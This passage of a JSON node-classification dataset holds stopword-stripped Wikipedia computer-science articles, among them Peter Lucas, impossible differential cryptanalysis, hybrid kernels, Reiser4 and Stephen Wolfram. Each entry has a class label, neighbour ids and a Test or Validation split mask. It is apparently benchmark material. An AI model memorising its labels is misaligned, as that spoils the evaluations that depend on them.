    "text": "Peter_Lucas_(computer_scientist):peter lucas computer scientist peter lucas born 13 january 1935 vienna austria – 2 february 2015 california united states austrian computer scientist university professor peter lucas graduated 1953 studied telecommunications vienna university technology completed studies 1959 diploma thesis topic programming electronic calculating machines member heinz zemanek group responsible system programming mailüfterl first fully transistorized computer continental europe 1961 moved mailüfterl group technical university ibm company working ibm laboratory vienna worked formal description programming languages together hans bekić kurt walk heinz zemanek responsible formal definition ibm programming language pl/i using vienna definition language vdl important part formal method vdm addition worked together hans bekić compiler algol 60 time gave lectures lectures vienna university technology johannes kepler university linz covering theoretical foundations programming formal definition programming languages 1978 joined thomas j. watson research center yorktown heights new york united states worked experimental compiler projects 1979 moved ibm san josé california later ibm almaden research center 1988 worked john backus group definition implementation functional programming language fl october 1993 appointed full professor software technology graz university technology retiring emeritus position july 2001 1994 chairman formal methods europe fme corresponding member austrian academy sciences peter lucas died 2 february 2015 age 80",
    "neighbors": [
      8262,
      2216,
      1610,
      3323,
      8502,
      1976,
      955
    ],
    "mask": "Test"
  },
  {
    "node_id": 7056,
    "label": 4,
    "text": "Impossible_differential_cryptanalysis:impossible differential cryptanalysis cryptography impossible differential cryptanalysis form differential cryptanalysis block ciphers ordinary differential cryptanalysis tracks differences propagate cipher greater expected probability impossible differential cryptanalysis exploits differences impossible probability 0 intermediate state cipher algorithm lars knudsen appears first use form attack 1998 paper introduced aes candidate deal first presentation attract attention cryptographic community later year rump session crypto '98 eli biham alex biryukov adi shamir introduced name impossible differential used technique break 4.5 8.5 rounds idea 31 32 rounds nsa-designed cipher skipjack development led cryptographer bruce schneier speculate nsa previous knowledge impossible differential cryptanalysis technique since applied many ciphers khufu khafre e2 variants serpent mars twofish rijndael crypton zodiac hierocrypt-3 tea xtea mini-aes aria camellia shacal-2 biham biryukov shamir also presented relatively efficient specialized method finding impossible differentials called miss-in-the-middle attack consists finding two events probability one whose conditions met together",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      658,
      660,
      1173,
      1941,
      4128,
      1315,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      7887,
      4561,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7057,
    "label": 3,
    "text": "Hybrid_kernel:hybrid kernel hybrid kernel operating system kernel architecture attempts combine aspects benefits microkernel monolithic kernel architectures used computer operating systems traditional kernel categories monolithic kernels microkernels nanokernels exokernels seen extreme versions microkernels hybrid category controversial due similarity hybrid kernels ordinary monolithic kernels term dismissed linus torvalds simple marketing idea behind hybrid kernel kernel structure similar microkernel implement structure manner monolithic kernel contrast microkernel nearly operating system services hybrid kernel still kernel space none reliability benefits services user space microkernel however ordinary monolithic kernel none performance overhead message passing context switching kernel user mode normally comes microkernel one prominent example hybrid kernel microsoft windows nt kernel powers operating systems windows nt family including windows 10 windows server 2019 powers windows phone 8 windows phone 8.1 xbox one nt-based windows classified hybrid kernel macrokernel rather monolithic kernel emulation subsystems run user-mode server processes rather kernel mode monolithic kernel large number design goals resemble design goals mach particular separation os personalities general kernel design conversely reason nt microkernel system system components run address space kernel would case monolithic design traditional monolithic design would microkernel per se kernel would implement broadly similar functionality nt microkernel kernel-mode subsystems windows nt design includes many objectives mach archetypal microkernel system one important structure collection modules communicate via well-known interfaces small microkernel limited core functions first-level interrupt handling thread scheduling synchronization primitives allows possibility using either direct procedure calls interprocess communication ipc communicate modules hence potential location modules different address spaces example either kernel space server processes design goals shared mach included support diverse architectures kernel abstractions general enough allow multiple operating system personalities implemented top object-oriented organisation primary operating system personality windows windows api always present emulation subsystem implements windows personality called client/server runtime subsystem csrss.exe versions nt prior 4.0 subsystem process also contained window manager graphics device interface graphics device drivers performance reasons however version 4.0 later modules often implemented user mode even monolithic systems especially designed without internal graphics support run kernel-mode subsystem applications run nt written one os personalities usually windows api native nt api documentation publicly available exception routines used device driver development os personality implemented via set user-mode dlls see dynamic-link library mapped application processes address spaces required together emulation subsystem server process described previously applications access system services calling os personality dlls mapped address spaces turn call nt run-time library ntdll.dll also mapped process address space nt run-time library services requests trapping kernel mode either call kernel-mode executive routines make local procedure calls lpcs appropriate user-mode subsystem server processes turn use nt api communicate application processes kernel-mode subsystems xnu kernel apple inc. acquired developed use macos ios watchos tvos operating systems released free open source software part darwin operating system xnu acronym x unix originally developed next nextstep operating system xnu hybrid kernel combining version 2.5 mach kernel developed carnegie mellon university components 4.3bsd object-oriented api writing drivers called driver kit apple acquired next mach component upgraded osfmk 7.3 microkernel apple uses heavily modified osfmk 7.3 functioning hybrid kernel parts freebsd included osfmk 7.3 includes applicable code university utah mach 4 kernel applicable code many mach 3.0 variants sprouted original carnegie mellon university mach 3.0 kernel bsd components upgraded code freebsd project driver kit replaced c++ api writing drivers called i/o kit like modern kernels xnu hybrid containing features monolithic microkernels attempting make best use technologies message passing capability microkernels enabling greater modularity larger portions os benefit protected memory well retaining speed monolithic kernels certain critical tasks xnu runs arm part ios ia-32 x86-64 based processors",
    "neighbors": [
      2560,
      10755,
      6155,
      6675,
      7187,
      8725,
      11283,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      11301,
      5158,
      6186,
      7217,
      8754,
      10803,
      9784,
      10809,
      576,
      2625,
      6221,
      1623,
      3160,
      10333,
      97,
      3681,
      10851,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      636,
      3197,
      1150,
      639,
      5247,
      641,
      5754,
      2179,
      7806,
      10883,
      7814,
      11390,
      10891,
      6797,
      10382,
      2196,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      3235,
      11430,
      8879,
      3248,
      178,
      3250,
      9907,
      6837,
      9910,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      6352,
      7382,
      8410,
      4316,
      9436,
      1247,
      11489,
      1253,
      7403,
      5356,
      9452,
      9964,
      242,
      5363,
      8441,
      9466,
      2811,
      9468,
      8445,
      1278,
      10499,
      5380,
      1804,
      8976,
      273,
      3857,
      787,
      8977,
      789,
      5397,
      11539,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      1339,
      2363,
      2365,
      2366,
      6459,
      6974,
      321,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      2391,
      7511,
      10590,
      3426,
      8551,
      3948,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      8576,
      10113,
      8069,
      3463,
      6023,
      7561,
      394,
      3978,
      4492,
      11667,
      4505,
      11675,
      8092,
      2462,
      5022,
      4515,
      421,
      1445,
      935,
      5029,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      3035,
      7133,
      5598,
      5093,
      4074,
      10730,
      10731,
      5103,
      6128,
      5105,
      8687,
      5619,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 7058,
    "label": 3,
    "text": "AMD_Socket_G3:amd socket g3 socket g3 originally part codenamed piranha server platform supposed intermediate successor socket f socket f+ used amd opteron processor dual-processor 2p server platforms scheduled launched 2009 socket g3 would accompanied socket g3 memory extender socket g3mx connecting large amounts memory single microprocessor g3mx chip placed motherboard amd planned socket g3 arrive advent previously planned 8-core mcm chip code named montreal since q1 2008 plan 8-core mcm server chip based 45 nm k10.5 design scrapped favor 6-core fully integrated mpu design code named istanbul use existing socket f/f+ platform produced nvidia broadcom well fiorano introduced amd 2009 however socket g3 officially discontinued march 2008 socket successor socket f lga 1974-pin socket g34",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      3464,
      4872,
      10260,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      8004,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      10225,
      1651
    ],
    "mask": "Test"
  },
  {
    "node_id": 7059,
    "label": 4,
    "text": "Q-CERT:q-cert qatar computer emergency response team created december 2006 cert/cc ictqatar qatar coordination center dealing internet security problems q-cert first-ever cert established middle east plans q-cert first announced december 2006 ictqatar cert coordination center entered partnership signed cooperation agreement sans institute provide training courses cyber security specialists qatar government november 2016 first gcc cyber drill held auspices q-cert engaged internet security specialists four gcc countries goals q-cert",
    "neighbors": [
      10437,
      7337,
      3941,
      10190
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7060,
    "label": 8,
    "text": "Oneindia:oneindia oneindia.com indian online portal founded bg mahesh owned greynium information technologies pvt ltd website provides news updates sports events travel entertainment business lifestyle videos classifieds seven different indian languages english kannada hindi tamil telugu bengali gujarati malayalam",
    "neighbors": [
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 7061,
    "label": 9,
    "text": "CorbaScript:corbascript corbascript object-oriented scripting language designed use corba",
    "neighbors": [
      9780,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 7062,
    "label": 2,
    "text": "Damien_Sandras:damien sandras damien sandras known free software community due work gnome specifically ekiga leading open source softphone linux desktop one founders fosdem event dedicated free software developers europe fosdem initially created raphaël bauduin name osdem sandras joined bauduin helped setting event sandras one driving forces behind organization 7 years ekiga supported free software foundation specifically richard stallman alternative proprietary skype stallman e-mail signature contained mention softphone years sandras graduate university louvain uclouvain mentioned university portal university success stories leading ip startup dealing enterprise open source voip software",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7063,
    "label": 2,
    "text": "Nokia_5230:nokia 5230 nokia 5230 also known nokia 5230 nuron smartphone manufactured nokia running symbian os v9.4 s60 5th edition released november 2009 announced august year features 3.2 inch resistive touchscreen 3g internet support support microsd memory cards also supports a-gps bluetooth fm radio full html internet browsing however lacks support wi-fi due status entry-level smartphone released nokia 5530 nokia 5800 xpressmusic featured wi-fi support 3g 3g wi-fi respectively lifespan 5230 sold around 150 million units making one best selling phones date particular success developing countries nuron version released north america wcdma band iv aws enabled comes preloaded maps united states canada mexico january 2010 nokia announced ovi maps available free certain smartphones includes nokia 5230 thus enabling free offline voice guided navigation 180 countries 51.0.002 latest firmware version available",
    "neighbors": [
      1537,
      8577,
      6276,
      3205,
      11271,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      8472,
      5274,
      5019,
      5659,
      669,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      1833,
      3626,
      5290,
      10410,
      9137,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1216,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 7064,
    "label": 1,
    "text": "Business_Intelligence_Development_Studio:business intelligence development studio business intelligence development studio bids former ide microsoft used develop data analysis business intelligence solutions utilizing microsoft sql server analysis services reporting services integration services based microsoft visual studio development environment customized sql server services-specific extensions project types including tools controls projects reports etl dataflows olap cubes data mining structure bids functionality augmented bids helper visual studio add-in features extended enhance business intelligence development functionality sql server 2005 2008 2008 r2 bi development studio bids sql server 2012 sql server data tools ssdt bids helper hosted microsoft open source project hosting website codeplex business intelligence markup language biml used bids create end-to-end bi solutions translating biml metadata sql server integration services ssis sql server analysis services ssas assets microsoft sql server platform bids supported visual studio 2010 later replaced sql server data tools business intelligence",
    "neighbors": [
      10900,
      10902,
      11030,
      3224,
      5401,
      11414,
      4384,
      8227,
      11683,
      11559,
      4010,
      10157,
      9263,
      11570,
      6709,
      8246,
      315,
      7486,
      4674,
      1347,
      1348,
      5320,
      4174,
      847,
      83,
      1366,
      9434,
      603,
      608,
      2401,
      8161,
      7523,
      3303,
      11498,
      3821,
      10991,
      3573,
      9205,
      5754,
      2943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7065,
    "label": 3,
    "text": "PowerQUICC:powerquicc powerquicc name several powerpc- power isa-based microcontrollers freescale semiconductor built around one powerpc cores communications processor module quicc engine separate risc core specialized tasks i/o communications atm security acceleration networking usb many components system-on-a-chip designs tailor made embedded applications powerquicc processors used networking automotive industrial storage printing consumer applications freescale using powerquicc processors part mobilegt platform freescale also manufactures quicc microcontrollers based older 68k technology four distinct lines processors mainly based processing power. mpc8xx family motorola first powerpc based embedded processors suited network processors system-on-a-chip devices core original implementation powerpc specification single issue four stage pipelined core mmu branch prediction unit speeds 133 mhz mpc821 introduced 1995 together mpc860 complete quicc engine slimmed version mpc850 reduced caches io ports came 1997 quicc communication processor module cpm offloads networking tasks cpu thus branding family powerquicc processors family differ on-chip features like usb serial pcmcia atm ethernet controllers different amount l1 caches ranging 1 kib 16 kib mpc8xx – powerquicc processors share common naming scheme powerquicc ii introduced 1998 direct descendant powerpc 603e core also goes name 603e g2 processors still 16/16 kib instruction/data l1 caches reaching frequencies 450 mhz communications processors used applications like voip systems telecom switches cellular base stations dslams powerquicc ii family processors phased favour powerful powerquicc ii pro line plans development core mpc82xx – powerquicc ii processors share common naming scheme introduced 2004 based e300 core enhanced powerpc 603e core 32/32 kib instruction/data l1 caches powerquicc ii pro used networking processors routers switches printers network-attached storage wireless access points dslams powerquicc ii pro processors reaches 677 mhz include multitude embedded technologies like usb pci ethernet security devices also use newer quicc engine network offload engine instead cpm used original powerquicc powerquicc ii series memory controller provides support ddr ddr2 sdrams mpc83xx – powerquicc ii pro processors share common naming scheme trailing e signifies processors built encryption module devices 834x name lacks quicc engine devices number like 836x one powerquicc iii processors based 32-bit power isa v.2.03 core called e500 introduced 2003 dual issue seven-stage pipeline double precision fpus 32/32 kib data instruction l1 caches multiple gigabit ethernet pci pcie rapidio ddr/ddr2 memory controllers security accelerators speeds ranges 533 mhz 1.5 ghz processors target enterprise level networking telecom applications high end storage printing imaging processors use older cpm module handling network processing offload use newer quicc engine powerquicc ii pro cpm quicc engine freescale marketing department nevertheless brand devices 85xx series powerquicc iii mpc85xx – powerquicc iii processors share common naming scheme trailing e signifies processors built-in encryption module powerquicc cease development favor software-compatible qoriq platform featuring powerpc e500 based processors single core multi-core 32 cores freescale keep manufacturing powerquicc processors foreseeable future existing customers help facilitate transition qoriq",
    "neighbors": [
      7809,
      6914,
      7299,
      3844,
      4868,
      1158,
      3846,
      4743,
      7302,
      5642,
      3467,
      1548,
      1933,
      7305,
      6415,
      3472,
      1170,
      2073,
      1563,
      1309,
      4897,
      3493,
      6949,
      6311,
      8102,
      1321,
      8231,
      8998,
      9391,
      10543,
      4017,
      5297,
      5809,
      11314,
      3255,
      8120,
      8761,
      11447,
      6715,
      9020,
      1725,
      1983,
      9665,
      10945,
      10180,
      3017,
      336,
      8530,
      3540,
      597,
      342,
      9302,
      3932,
      11613,
      6878,
      3936,
      10501,
      1635,
      8931,
      869,
      7269,
      10214,
      10985,
      9964,
      8048,
      3185,
      10224,
      4211,
      5235,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 7066,
    "label": 4,
    "text": "CronLab:cronlab cronlab limited privately held limited company provides information security web filtering software solutions businesses consumers either directly via integration third party products cronlab offices london united kingdom gothenburg sweden cronlab founded gothenburg sweden introduced first anti-spam hardware appliances 2009 appliances received positive reviews industry media pc pro crn magazine sc magazine cited systems ease use quick set tested email filtering technology 99 accurate 2010 company moved headquarters london united kingdom also released software service hosted models spam filtering technology awarded recommendation techworld hosted email archiving solutions cide group toy manufacturer partnered cronlab development children tablet computer tablet called kurio features cronlab hosted web-filtering parental controls technology cronlab agreements distribution france belgium switzerland germany norway bulgaria moldova romania ireland united kingdom company security products aim protect email web threats spam spyware trojans viruses also provide email archiving solution cronlab products support multi-tenancy marketed isps msps consultants products also white labelled",
    "neighbors": [
      10756,
      11685,
      467,
      10392,
      5373,
      7739,
      9053
    ],
    "mask": "Test"
  },
  {
    "node_id": 7067,
    "label": 7,
    "text": "Inter-Language_Unification:inter-language unification inter-language unification ilu method computer systems exchange data bridging differences way systems represent various kinds data even two systems run computer identical computer hardware many differences arise use different computer languages build systems object interfaces provided ilu hide implementation distinctions different languages different address spaces operating system types ilu used build multi-lingual object-oriented libraries class libraries well-specified language-independent interfaces also used implement distributed systems also used define document interfaces modules non-distributed programs ilu interfaces specified either object management group corba interface definition language omg idl ilu interface specification language isl ilu developed open source project xerox palo alto research center xerox parc 1991 2000 last release 2.0beta1 1997 2000 ilu used foundation experimental work next generation http protocol world wide web consortium http-ng activity result work particularly efficient experimental rpc protocol called w3ng developed along way efficiently multiplexing single tcp connection multiple channels directions called w3mux results http-ng experiment presented 2000 world wide web conference last release supported programming languages c++ corba2 mapping ansi c python java common lisp contributed support also available modula-3 guile scheme perl 5 ilu installed flavors unix sunos solaris hp-ux aix osf irix freebsd linux lynxos sco unix etc ms-windows 3.1 95 nt supported threaded posix solaris nt franz acl ppcr modula-3 event-loop xt tk xview operation one implementation goals maximize compatibility existing open standards result ilu provided support use omg corba idl interface description language thought corba orb system though omissions extensions corba spec ilu also included self-contained implementation onc rpc possible describe use existing rpc services ilu objects ilu also included self-contained implementation world wide web hypertext transfer protocol http could thus used implement object-oriented web browsers servers communication security provided gss-based context negotiation on-the-wire encryption",
    "neighbors": [
      8582,
      6797,
      2062,
      1304,
      10012,
      10924,
      5677,
      7983,
      823,
      4797,
      3517,
      10436,
      8262,
      5598,
      5471,
      9441,
      10465,
      8554,
      9962,
      2804,
      4341,
      2424,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 7068,
    "label": 4,
    "text": "Omron:omron styled omron electronics company based kyoto japan omron established 1933 tateishi electric manufacturing company incorporated 1948 company originated area kyoto called name omron derived prior 1990 corporation known omron tateishi electronics 1980s early 1990s company motto machine work machines man thrill creation omron primary business manufacture sale automation components equipment systems generally known medical equipment digital thermometers blood pressure monitors nebulizers omron developed world first electronic ticket gate named ieee milestone 2007 one first manufacturers automated teller machines atm magnetic stripe card readers omron oilfield marine provider ac dc drive systems custom control systems oil gas related industries omron named one thomson reuters top 100 global innovators 2013 september 30 2015",
    "neighbors": [
      9863,
      3215,
      2963,
      8355,
      5028,
      424,
      10537,
      8237,
      2862,
      2737,
      9137,
      10303,
      196,
      4548,
      8900,
      6993,
      8048,
      1400,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 7069,
    "label": 9,
    "text": "Stephen_Wolfram:stephen wolfram stephen wolfram born 29 august 1959 british-american computer scientist physicist businessman known work computer science mathematics theoretical physics 2012 named inaugural fellow american mathematical society businessman founder ceo software company wolfram research worked chief designer mathematica wolfram alpha answer engine recent work knowledge-based programming expanding refining programming language mathematica called wolfram language stephen wolfram born london 1959 hugo sybil wolfram german jewish refugees united kingdom wolfram father hugo wolfram 1925–2015 textile manufacturer born bochum germany served managing director lurex company makers fabric lurex also author three novels emigrated england 1933 world war ii broke left school 15 subsequently found hard get job since regarded enemy alien adult took correspondence courses philosophy psychology wolfram mother sybil wolfram 1931–1993 born sybille misch originally berlin germany fellow tutor philosophy lady margaret hall university oxford 1964 1993 published two books philosophical logic introduction 1989 in-laws outlaws kinship marriage england 1987 translator claude lévi-strauss la pensée sauvage savage mind later disavowed translation daughter criminologist psychoanalyst kate friedlander 1902–1949 expert subject juvenile delinquency physician walter misch 1889–1943 together wrote die vegetative genese der neurotischen angst und ihre medikamentöse beseitigung reichstag fire 1933 emigrated berlin germany england parents jewish psychoanalyst paula heimann 1899–1982 stephen wolfram married mathematician four children together stephen son christopher began degree course mathematics computer science 2018 co-inventor patented method computing device optically recognizing mathematical expressions christopher presented led workshops several highly-regarded conferences events including south southwest interactive university oxford summer school mit independent activities period 2016 awarded best technical advisor raw science film festival work movie arrival among many personal achievements serves programmer wolfram research wolfram educated eton college left prematurely 1976 entered st. john college oxford age 17 found lectures awful left 1978 without graduating attend california institute technology following year received phd particle physics 19 november 1979 age 20 wolfram thesis committee composed richard feynman peter goldreich frank j. sciulli steven frautschi chaired richard d. field young child wolfram difficulties learning arithmetic age 12 wrote directory physics age 14 written three books particle physics wolfram age 15 began research applied quantum field theory particle physics published scientific papers topics included matter creation annihilation fundamental interactions elementary particles currents hadronic leptonic physics parton model published professional peer-reviewed scientific journals including nuclear physics b australian journal physics nuovo cimento physical review working independently wolfram published widely cited paper heavy quark production age 18 nine papers continued research publish particle physics early twenties wolfram work geoffrey c. fox theory strong interaction still used experimental particle physics 1981 letter feynman gerald freund giving reference wolfram macarthur grant appears feynman collected letters perfectly reasonable deviations beaten track following phd wolfram joined faculty caltech became youngest recipient macarthur fellowships 1981 age 21 1983 wolfram left school natural sciences institute advanced study princeton conducted research cellular automata mainly computer simulations produced series papers systematically investigating class elementary cellular automata conceiving wolfram code naming system one-dimensional cellular automata classification scheme complexity behaviour conjectured rule 110 cellular automaton might turing complete later proved correct 1985 letter feynman wolfram also appears feynman letters response wolfram writing thinking creating kind institute might study complex systems feynman tells wolfram understand ordinary people advises find way research little contact non-technical people possible mid-1980s wolfram worked simulations physical processes turbulent fluid flow cellular automata connection machine alongside feynman helped initiate field complex systems 1984 participant founding workshops santa fe institute along nobel laureates murray gell-mann manfred eigen philip warren anderson future laureate frank wilczek 1986 founded center complex systems research ccsr university illinois urbana–champaign 1987 journal complex systems first journal field complex systems published many papers course three decades complex systems developed broad base readers contributors academia industry government general public 50 countries around world wolfram led development computer algebra system smp symbolic manipulation program caltech physics department 1979–1981 dispute administration intellectual property rights regarding smp—patents copyright faculty involvement commercial ventures—eventually caused resign caltech smp developed marketed commercially inference corp. los angeles 1983–1988 1983 wolfram joined institute advanced study princeton new jersey-based former home albert einstein time longer interested particle physics instead began pursuing viewed creative areas — specifically cellular automata wolfram methodically analyzed sets rules developing classification system rated complexity various cellular automata — intention clarifying way view complexity real world wolfram mind studying results cellular-automata runs computer could unlock deep truths universe wolfram cellular-automata work came cited 10,000 papers 1986 wolfram left institute advanced study university illinois urbana–champaign founded center complex systems research started develop computer algebra system mathematica first released 23 june 1988 left academia 1987 founded wolfram research continues develop market program near end sybil wolfram life part research in-laws outlaws used son program mathematica analyze data wolfram younger brother conrad wolfram serves ceo wolfram research europe ltd. 1992 2002 worked controversial book new kind science presents empirical study simple computational systems additionally argues fundamental reasons types systems rather traditional mathematics needed model understand complexity nature wolfram conclusion universe digital nature runs fundamental laws described simple programs predicts realization within scientific communities major revolutionary influence physics chemistry biology majority scientific areas general reason book title since release book 2002 wolfram split time developing mathematica encouraging people get involved subject matter new kind science giving talks holding conferences starting summer school devoted topic beginning may 2017 15th anniversary hardcover publication free electronic version new kind science launched includes complete access high-resolution images wolfram axiom result computer exploration new kind science looking shortest single axiom equivalent axioms boolean algebra propositional calculus result search axiom six nand operations three variables equivalent boolean algebra vertical bar represents nand logical operation also known sheffer stroke 25 candidates precisely set sheffer identities length less equal 15 elements excluding mirror images noncommutative models size less equal 4 variables 2003 wolfram hosted first wolfram summer school brown university — program designed provide educational career opportunities learning conducting projects frontiers science technology innovation 2007 summer school began hosted university vermont burlington exception year 2009 held istituto di scienza e tecnologie dell'informazione cnr pisa italy 2012 program held curry college milton massachusetts since 2013 wolfram summer school held annually bentley university waltham massachusetts new kind science idea exploring new abstract universe computational universe simple programs new kind science wolfram shows simple programs computational universe capture essence complexity – beauty – many systems nature led creation wolfram tones works taking simple programs wolfram computational universe applying music theory wolfram language algorithms render music program effect defines virtual world special story — wolfram tones captures musical composition new kind science wolfram found simplest known universal turing machine — 2 states 5 colors however also extensive search simpler turing machines found much simpler candidate universality 2,3 turing machine 14 may 2007 fifth anniversary publication new kind science wolfram announced 25,000 prize first person determine whether 2,3 turing machine actually universal could provide proof five months contest announcement undergraduate student birmingham uk successfully found 2,3 turing machine universal provided 40-page paper prove findings march 2009 wolfram announced wolfram|alpha answer engine wolfram|alpha later launched may 2009 paid-for version extra features launched february 2012 engine based natural language processing large library algorithms answers queries using approach described new kind science application programming interface allows applications extend enhance alpha wolfram believes wolfram alpha comes common use raise level scientific things average person wolfram alpha one answer engines behind microsoft bing apple siri answering factual questions 2010 wolfram co-founded touchpress along theodore gray max whitby john cromie company specialised creating in-depth premium apps games covering wide range educational subjects designed children parents students educators since launch touchpress published 100 apps march 2014 annual south southwest sxsw event wolfram officially announced wolfram language new general multi-paradigm programming language currently better known multi-paradigm computational communication language documentation language pre-released october 2013 coincide bundling mathematica wolfram language every raspberry pi computer wolfram language existed 25 years primary programming language used mathematica officially named 2014 wolfram son christopher wolfram appeared program sxsw giving live-coding demonstration using wolfram language blogged wolfram language wolfram research 8 december 2015 wolfram published book elementary introduction wolfram language introduce people knowledge programming wolfram language kind computation allows release second edition book coincided ceo hire competition 2017 collision tech conference beginning 2017 wolfram began live stream internal wolfram language development meetings meetings viewers encouraged submit questions comments related development programming language viewers known suggest new functions would like see developed name new functions help solve complex issues faced stephen wolfram research development team live streamed meetings viewed twitch.tv youtube live facebook live archived live streams also accessed personal website significance data products wolfram creates transfers life extensive log personal analytics including emails received sent keystrokes made meetings events attended phone calls even physical movement dating back 1980s preface new kind science noted recorded one-hundred million keystrokes one-hundred mouse miles stated personal analytics give us whole new dimension experiencing lives stephen wolfram christopher wolfram involved helping create alien language film arrival used wolfram language since 2018 wolfram producing podcast podcast stephen discusses topics ranging history science future civilization ethics ai",
    "neighbors": [
      4483,
      6408,
      7048,
      11538,
      1443,
      11555,
      679,
      1849,
      5830,
      5319,
      8262,
      10953,
      5857,
      5604,
      7780,
      8301,
      8046,
      3567,
      1783,
      8057
    ],
    "mask": "Test"
  },
  {
    "node_id": 7070,
    "label": 6,
    "text": "Reiser4:reiser4 reiser4 computer file system successor reiserfs file system developed scratch namesys sponsored darpa well linspire reiser4 named former lead developer hans reiser reiser4 patch set still maintained according phoronix unlikely merged mainline linux without corporate backing goals reiser4 file system advanced reiser4 features user-defined transactions also available lack vfs api present reiser4 lacks standard file system features online repacker similar defragmentation utilities provided file systems creators reiser4 say implement later sooner someone pays reiser4 uses b*-trees conjunction dancing tree balancing approach underpopulated nodes merged flush disk except memory pressure transaction completes system also allows reiser4 create files directories without waste time space fixed blocks synthetic benchmarks performed namesys 2003 show reiser4 10 15 times faster serious competitor ext3 working files smaller 1 kib namesys benchmarks suggest typically twice performance ext3 general-purpose filesystem usage patterns benchmarks 2006 show results reiser4 slower many operations benchmarks conducted 2013 linux kernel version 3.10 show reiser4 considerably faster various tests compared in-kernel filesystems ext4 btrfs xfs reiser4 patches linux 2.6 3.x 4.x 5.x. reiser4 merged mainline linux kernel consequently still supported many linux distributions however predecessor reiserfs v3 widely adopted reiser4 also available andrew morton -mm kernel sources zen patch set linux kernel developers claim reiser4 follow linux coding standards hans reiser suggested political reasons latest released reiser4 kernel patches tools downloaded reiser4 project page sourceforge.net hans reiser convicted murder april 28 2008 leaving future reiser4 uncertain arrest employees namesys assured would continue work events would slow software development immediate future order afford increasing legal fees hans reiser announced december 21 2006 going sell namesys march 26 2008 sold although website unavailable january 2008 edward shishkin employee programmer namesys quoted cnet interview saying commercial activity namesys stopped shishkin others continued development reiser4 making source code available shishkin web site later relocated kernel.org since 2008 namesys employees received 100 sponsored funding darpa 2010 phoronix wrote edward shishkin exploring options get reiser4 merged linux kernel mainline file system still updated new kernel releases submitted merging 2015 michael larabel metioned unlikely happen without corporate backing suggested april 2019 main obstacle could renaming reiser4 refers initial author involved murder case",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      29,
      9249,
      9762,
      5158,
      3640,
      7225,
      11323,
      8772,
      1109,
      10851,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      5244,
      2687,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      1231,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      4841,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      3859,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      819,
      1844,
      6963,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      11667,
      5013,
      11675,
      11676,
      414,
      2974,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      492,
      7663,
      11256,
      2555,
      3582,
      11263
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7071,
    "label": 9,
